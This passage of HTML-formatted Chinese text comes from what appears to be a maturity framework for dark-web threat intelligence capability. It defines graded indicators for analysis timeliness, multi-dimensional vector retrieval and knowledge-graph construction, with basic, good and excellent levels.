style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估对暗网情报进行分析处理的响应速度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网中的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高价值情报</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">具有</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">极强的时效性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，若分析处理延迟过长，可能导致相关主体在威胁出现的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">关键窗口期</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">无法获得有效预警，错失</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">阻断威胁传播、降低安全损失</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的最佳时机。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，该指标重点考察对</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高价值情报的分析时效</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，这一能力</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">直接关系到情报从原始采集到可行动成果的转化效率</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为风险评估和应急响应提供及时、可靠的决策支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.3.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合暗网情报的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">时效性特征</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与实际分析需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网中的高价值情报具有极强的时效性，其核心价值会随着时间推移快速衰减，若无法及时分析处理，将错过最佳的风险处置时机。同时，暗网数据存在显著特点 ——</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">海量性、非结构化、碎片化且伴随高噪音</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，这使得实时全自动分析在技术层面存在较高难度。即便在国际范围内，一流的暗网情报分析机构，对高价值情报的自动化分析平均时长也多在 15 分钟至 2 小时之间，难以实现真正的秒级实时响应。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">情报分析的自动化程度和响应延迟</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化标准，通过设定科学合理的分级阈值，确保该指标能够客观、准确地反映出情报分析的效率与水平，清晰呈现不同能力层级的差距，为后续的风险研判和应急处置提供可靠依据。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.3.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">情报分析时效性以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高价值情报的分析响应延迟</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="131" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="325" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="112" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="131" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">情报分析时效性</span></span></p></td><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">未进行系统化或明确的情报分析</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">半自动化对高价值暗网情报进行分析，延迟 &lt; 24小时</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">成熟运用AI技术，对高价值暗网情报自动化分析，延迟 &lt; 1小时</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对高价值暗网情报的分析响应速度。通过量化分析延迟，可客观反映情报分析环节的时效性，为后续风险评估、事件研判和应急处置提供及时、可靠的决策支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">5.4.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">多维度向量检索</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.4.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多维度向量检索</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">是暗网情报智能分析能力的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要支撑指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估对海量情报数据进行高效、精准检索的能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报具有</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">海量性、碎片化、多源分散</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的特点。若无法实现多维度向量检索，则难以在复杂数据中快速定位相关情报，导致情报利用效率低下，无法满足风险预警和事件溯源的实时需求。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，该指标重点考察</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基于关键实体、分级分类、情报价值等多维度条件的向量检索能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，直接关系到情报分析的便捷性和实用性，为后续知识图谱构建和风险决策提供快速、准确的数据支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.4.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合暗网情报的数据特征与实际分析需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报具有</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">海量性、碎片化、多源分散</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的特点，传统关键词检索难以满足复杂查询需求。</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">向量检索技术</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">能够基于语义相似性实现高效定位。其中，单一维度向量检索主要依赖单一条件进行匹配，而</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多维度联合查询向量检索</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">则可同时融合关键实体、分级分类、情报价值等多类条件，实现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">更精准、更全面的关联检索</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，其价值在于显著提升情报</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">定位效率和分析深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">向量检索的维度覆盖范围和查询能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，通过设定合理的分级标准，确保该指标能够客观反映情报分析支撑能力上的实际差距。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.4.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">多维度向量检索以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">向量检索的维度覆盖范围和查询能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="131" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="325" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="112" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="131" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">多维度向量检索</span></span></p></td><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">仅支持基于原始情报关键词的传统检索</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">支持基于关键实体和分级分类的向量检索</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">支持多维度联合查询条件向量检索（基于情报关键实体+分级分类）</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估对暗网情报进行多维度向量检索的能力。通过量化检索的维度覆盖范围和查询复杂度，可客观反映情报分析支撑环节的智能化水平，为后续知识图谱构建和风险决策提供高效、精准的数据支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">5.5.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">情报知识图谱构建</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.5.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">建立</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">情报知识图谱</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">是暗网情报智能分析能力的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最高阶核心指标之一</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其核心设计目的在于：</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评估将分散的原始情报转化为结构化、关联化知识体系的能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报具有</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高度碎片化、多源分散</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的显著特征，原始数据往往分散在不同来源、不同场景中，缺乏系统性关联。若无法实现跨威胁源、跨事件、跨实体的知识图谱构建，将难以形成完整的威胁视图，导致各类情报相互孤立，无法有效支撑复杂威胁的溯源、深度研判及趋势预测，进而影响风险应对的及时性和准确性。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察对知识图谱的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">自动化构建与关联能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，这一能力直接决定了暗网情报从 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">“原始数据” 到 “可用知识” 的转化深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为威胁分析、风险评估及战略决策提供系统化、智能化的核心支撑，助力实现对暗网威胁的全面掌控和精准应对。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.5.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标的设计依据主要结合暗网情报的数据特征与分析实际需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">建立</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">情报知识图谱</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">是暗网情报分析的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最高阶核心指标之一</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，技术实现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">难度极高</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，主要源于暗网数据的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">海量性、非结构化特性、碎片化分布以及威胁源的频繁波动</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。即使是国际顶级的暗网情报分析机构，目前也仅能实现半自动化构建，仍需大量人工干预方可完成跨威胁源、跨事件、跨实体的关联整合。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以知识图谱构建的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">自动化程度和关联范围</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，通过设定合理的分级标准，确保该指标能够客观反映情报分析高阶能力上的实际差距。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">5.5.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">建立以</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">知识图谱构建的自动化程度和关联范围</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="131" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="325" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="112" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="131" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">建立情报知识图谱</span></span></p></td><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">未建立系统化或明确的知识图谱关联</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">支持半自动化知识图谱构建，可基于人工引导进行跨事件关联</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="325" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">实现全自动跨威胁源、发布者、威胁事件、实体的知识图谱构建与关联</span></span></p></td><td data-colwidth="112" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 